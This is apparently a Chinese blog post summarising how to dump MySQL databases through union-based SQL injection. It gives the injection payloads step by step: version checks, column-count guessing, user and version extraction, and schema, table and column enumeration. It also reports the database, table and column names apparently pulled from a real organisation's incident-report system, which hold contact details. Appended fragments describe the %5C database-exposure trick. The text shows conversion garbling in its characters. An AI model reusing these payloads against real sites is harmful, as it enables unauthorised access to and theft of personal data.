mysql暴庫總結

2022-09-24 00:33:09 字數 1035 閱讀 5496

1.判斷版本 and ord(mid(version(),1,1))>51 返回正常,說明大於4.0版本,支援ounion查詢

2.猜解字段數目,

用order by也可以猜,

也可以用union select乙個乙個的猜解

and 2=4 union select 1,2,3,4,5,6,7,8,9--

3.檢視資料庫版本及當前使用者,

and 2=4 union select 1,user(),version(),4,5,6,7,8,9--

資料庫版本5.1.35,據說mysql4.1以上版本支援concat函式,

4.判斷有沒有寫許可權

and (select count(*) from mysql.user)>0--

返回錯誤,沒有寫許可權

手動猜表

5.查庫,以前用union select 1,2,3,schema_name,5,6,n from information_schema.schemata limit 0,1

土耳其黑客的手法

成功查出所有資料庫,國外的黑客就是不一般。資料庫如下:

information_schema,advisory,ir,mad,member,mysql,twcert,vuldb,vulscandb

6.爆表,爆的是twcert庫

爆出如下表

downloadfile,irsys,newsdata,secrpt,secrpt_big5

7.爆列名,這次爆的是irsys表

爆出如下列

ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status

8.查詢字段數,到這一步,國內很少有黑客去查詢欄位數的,直接用limit n,1去查詢,直接n到報錯為止。

返回是3,說明每個列裡有3個地段

9.爆欄位內容

爆出name列的第乙個欄位的內容

爆出name列的第二個欄位的內容

mysql暴庫 大牛教你查庫暴庫

and ord mid version 1,1 51 返回正常,說明大於4.0版本,支援ounion查詢 2.猜解字段數目,用order by也可以猜,也可以用union select乙個乙個的猜解 and 2 4 union select 1,2,3,4,5,6,7,8,9 3.檢視資料庫版本及當...

5C 暴庫漏洞

的unicode是 5c,主要就是暴庫漏洞 那麼,我看到下面四種情況 1,直接暴庫,解決方法在conn.asp中加入on error resume next duoluo.webdream dlog 5cshowlog.asp?cat id 16 log id 444 2,不顯示任何資訊,原因已打入...

對暴庫的一點認識

去年的時候曾經有一段時間研究過ie雙解碼,所以對暴庫有一定的認識,前些天終於收到黑客的雜誌,裡面看了一篇臨的文章,下面我也談談個人對那篇文章的認識,這裡要說的是,大家如果再深入點研 究下去,就會發現,暴庫的利用不只是這麼簡單,還會有更多可以用的東東。暴庫的方式有多種多樣,我知道的就有3種以上,常見的...